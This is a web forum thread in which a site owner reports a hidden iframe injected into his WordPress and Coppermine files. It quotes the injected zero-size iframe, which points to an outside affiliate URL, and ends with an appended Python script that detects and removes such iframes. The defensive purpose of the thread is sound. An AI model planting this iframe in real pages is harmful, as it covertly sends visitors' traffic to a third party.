There's an exploit out there and if your site gets hacked chances are you won't even know it.
The hack inserts code into php and html files. In my case two apps were hacked on my site yesterday - one was the WordPress Blog, the other was a php image gallery, Coppermine.
What code was inserted?:
[syntax="html"]<html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=razec marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>[/syntax]
Very simple. Get yourself a nice search and replace utility that does batch replaces and replace the code leaving the replace field blank. Or write a script to do it on the server.
The problem? They'll be back.
So can any experts out there (I'm just a photographer) shed some light on how a client-sider like me can secure his shared server (Apache) from these cybertrash kiddies and their sick bots?
Any suggestions would be greatly appreciated. I run many PHP applications including PixelPost and phpBB, but only Coppermine and WordPress were infected. It seems that the CMS community is very hush-hush on these exploits (bad publicity for them) and, as I said before, most users (probably thousands of them) don't know the code is there unless it breaks an application by busting up the code.
Thanks in advance.
edit: I should have added that the code doesn't try to break the site, it just redirects traffic in the background to generate ad revenue, I guess. If you watch the status bar you will see all kinds of transfers going on while the page loads. In some cases it does break it unwittingly; for example, it caused IE to read my CSS wrong and send my WP sidebar to the bottom. That was the tipoff for me.
feyd | Please use code tags and [syntax="..."] tags where appropriate when posting code. Your post has been edited to reflect how we'd like it posted. Please read: [url=http://forums.devnetwork.net/viewtopic.php?t=21171]Posting Code in the Forums[/url] to learn how to do it too.
[quote="[url=http://forums.devnetwork.net/viewtopic.php?t=30037]Forum Rules[/url] Section 1.1"][b]2.[/b] Use descriptive subjects when you start a new thread. Vague titles such as "Help!", "Why?" are misleading and keep you from receiving an answer to your question.[/quote]
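The post mentions writing a script to remove the inserted code on the server. The following is an added example, not part of the original post: it generalizes from the exact string shown to any zero-size iframe with no nested markup, and the names `strip_injected`, `scan_tree` and `backup_dir` are hypothetical.

```python
"""Find (and optionally strip) hidden zero-size iframes injected into PHP/HTML files."""
import os
import re
import shutil

# A zero-size iframe with no nested markup, matched regardless of attribute order/quoting.
_IFRAME = (r"<iframe\b(?=[^>]*\bwidth\s*=\s*[\"']?0\b)"
           r"(?=[^>]*\bheight\s*=\s*[\"']?0\b)[^>]*>[^<]*</iframe>")
# The post's sample is wrapped in its own <html>...</html>; remove that wrapper only
# when it encloses nothing but the iframe, so a page's real <html> tags survive.
INJECTED = re.compile(rf"<html>\s*{_IFRAME}\s*</html>|{_IFRAME}", re.I)


def strip_injected(text):
    """Return (cleaned_text, number_of_iframes_removed)."""
    return INJECTED.subn("", text)


def scan_tree(root, backup_dir=None, exts=(".php", ".html", ".htm")):
    """Report {path: hit_count}; clean in place only if backup_dir is given."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            # latin-1 maps every byte to one character, so the rewrite is lossless.
            with open(path, encoding="latin-1", newline="") as fh:
                text = fh.read()
            cleaned, count = strip_injected(text)
            if not count:
                continue
            hits[path] = count
            if backup_dir:
                # Keep the infected copy outside the web root as evidence.
                saved = os.path.join(backup_dir, os.path.relpath(path, root))
                os.makedirs(os.path.dirname(saved), exist_ok=True)
                shutil.copy2(path, saved)
                with open(path, "w", encoding="latin-1", newline="") as fh:
                    fh.write(cleaned)
    return hits


if __name__ == "__main__":
    import sys
    for path, count in sorted(scan_tree(sys.argv[1]).items()):
        print(f"{count} hidden iframe(s): {path}")
```

Run it without `backup_dir` first to get a report only; pass a `backup_dir` outside the web root to clean the files and keep the infected copies.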